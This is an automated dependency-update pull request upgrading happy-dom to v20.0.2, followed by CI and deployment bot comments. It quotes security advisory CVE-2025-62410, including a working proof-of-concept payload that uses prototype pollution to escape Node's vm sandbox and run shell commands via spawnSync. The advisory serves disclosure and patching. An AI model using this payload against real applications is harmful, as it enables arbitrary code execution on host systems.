chore(deps): update dependency happy-dom to v20.0.2 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
happy-dom	20.0.0 → 20.0.2

GitHub Vulnerability Alerts

CVE-2025-62410

Summary

The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads.

Details

The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).

PoC

Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn().

import { Browser } from "happy-dom";

const browser = new Browser({settings: {enableJavaScriptEvaluation: true}});
const page = browser.newPage({console: true});

page.url = 'https://example.com';
let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};'
page.content = `<html>
<script>
    function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} 
    this.constructor.constructor.__proto__.__proto__.toString = f;
    this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;
    // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf
    
</script>
<body>Hello world!</body></html>`;

await browser.close();
console.log(`The process object is ${process}`);
console.log(process.hasOwnProperty('spawn'));

Impact

Arbitrary code execution via breaking out of the Node.js' vm isolation.

Recommended Immediate Actions

Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to isolated-vm is suggested instead.

Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory.

---

Release Notes

capricorn86/happy-dom (happy-dom)

v20.0.2

Compare Source

👷‍♂️ Patch fixes

• Adds frozen intrinsics flag to workers in @happy-dom/server-renderer - By @​capricorn86 in task #​1934

v20.0.1

Compare Source

👷‍♂️ Patch fixes

• Adds warning for environment with unfrozen intrinsics (builtins) when JavaScript evaluation is enabled- By @​capricorn86 in task #​1932
  • A security advisory has been reported showing that the recommended preventive measure of running Node.js with --disallow-code-generation-from-strings wasn't enough to protect against attackers escaping the VM context and accessing process-level functions. Big thanks to @​cristianstaicu for reporting this!
  • The documentation for how to run Happy DOM with JavaScript evaluation enabled in a safer way has been updated. Read more about it in the Wiki

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[netlify]

❌ Deploy Preview for yunielacosta failed.

Name	Link
🔨 Latest commit	b73d0bb
🔍 Latest deploy log	https://app.netlify.com/projects/yunielacosta/deploys/68e9b66e41177500087b1134

[github-actions]

🤖 Hi @renovate[bot], I've received your request, and I'm working on it now! You can track my progress in the logs for more details.

[coderabbitai]

Important

Review skipped

Bot user detected.

To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

---

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[cloudflare-workers-and-pages]

Deploying yacosta738-v3 with    Cloudflare Pages

Latest commit:	b73d0bb
Status:	🚫  Build failed.

View logs

[cloudflare-workers-and-pages]

Deploying yap-portfolio with    Cloudflare Pages

Latest commit:	0c23b4d
Status:	🚫  Build failed.

View logs

[cloudflare-workers-and-pages]

Deploying with    Cloudflare Workers

The latest updates on your project. Learn more about integrating Git with Workers.

Status	Name	Latest Commit	Updated (UTC)
✅ Deployment successful! View logs	yap-api	0c23b4d	Dec 31 2025, 02:11 PM

[github-actions]

🎭 Playwright Test Results

Total Tests: N/A
Passed: N/A ✅
Failed: N/A ❌
Flaky: N/A ⚠️
Duration: 544s

View full report in artifacts

[github-actions]

🎭 Playwright Test Results

Total Tests: N/A
Passed: N/A ✅
Failed: N/A ❌
Flaky: N/A ⚠️
Duration: 539s

View full report in artifacts

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	✅ success
🎭 E2E Tests	✅ success
📊 Code Quality	✅ success

Commit: ccd8c9f
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	✅ success
🎭 E2E Tests	❌ cancelled
📊 Code Quality	✅ success

Commit: 7fc24a6
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	❌ failure
🧪 Unit Tests	✅ success
🏗️ Build	⏭️ skipped
🎭 E2E Tests	⏭️ skipped
📊 Code Quality	✅ success

Commit: 9ccf796
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	✅ success
🎭 E2E Tests	✅ success
📊 Code Quality	✅ success

Commit: 7a56b47
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	✅ success
🎭 E2E Tests	✅ success
📊 Code Quality	✅ success

Commit: e3354cc
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	❌ cancelled
🎭 E2E Tests	❌ cancelled
📊 Code Quality	✅ success

Commit: 81806c6
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	✅ success
🎭 E2E Tests	✅ success
📊 Code Quality	✅ success

Commit: ed88e00
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	✅ success
🎭 E2E Tests	✅ success
📊 Code Quality	✅ success

Commit: 4a36a05
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	✅ success
🎭 E2E Tests	✅ success
📊 Code Quality	✅ success

Commit: 0e06e10
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	✅ success
🎭 E2E Tests	✅ success
📊 Code Quality	✅ success

Commit: 9bf6c81
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	✅ success
🎭 E2E Tests	✅ success
📊 Code Quality	✅ success

Commit: a0b8e30
Workflow: View Details

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	✅ success
🏗️ Build	✅ success
🎭 E2E Tests	✅ success
📊 Code Quality	✅ success

Commit: 12108af
Workflow: View Details

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	❌ failure
🏗️ Build	❌ failure
🎭 E2E Tests	⏭️ skipped
📊 Code Quality	✅ success

Commit: eead8dc
Workflow: View Details

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

[github-actions]

🤖 CI Pipeline Results

Check	Status
🔍 Lint & Type Check	✅ success
🧪 Unit Tests	❌ failure
🏗️ Build	❌ failure
🎭 E2E Tests	⏭️ skipped
📊 Code Quality	✅ success

Commit: ef051c3
Workflow: View Details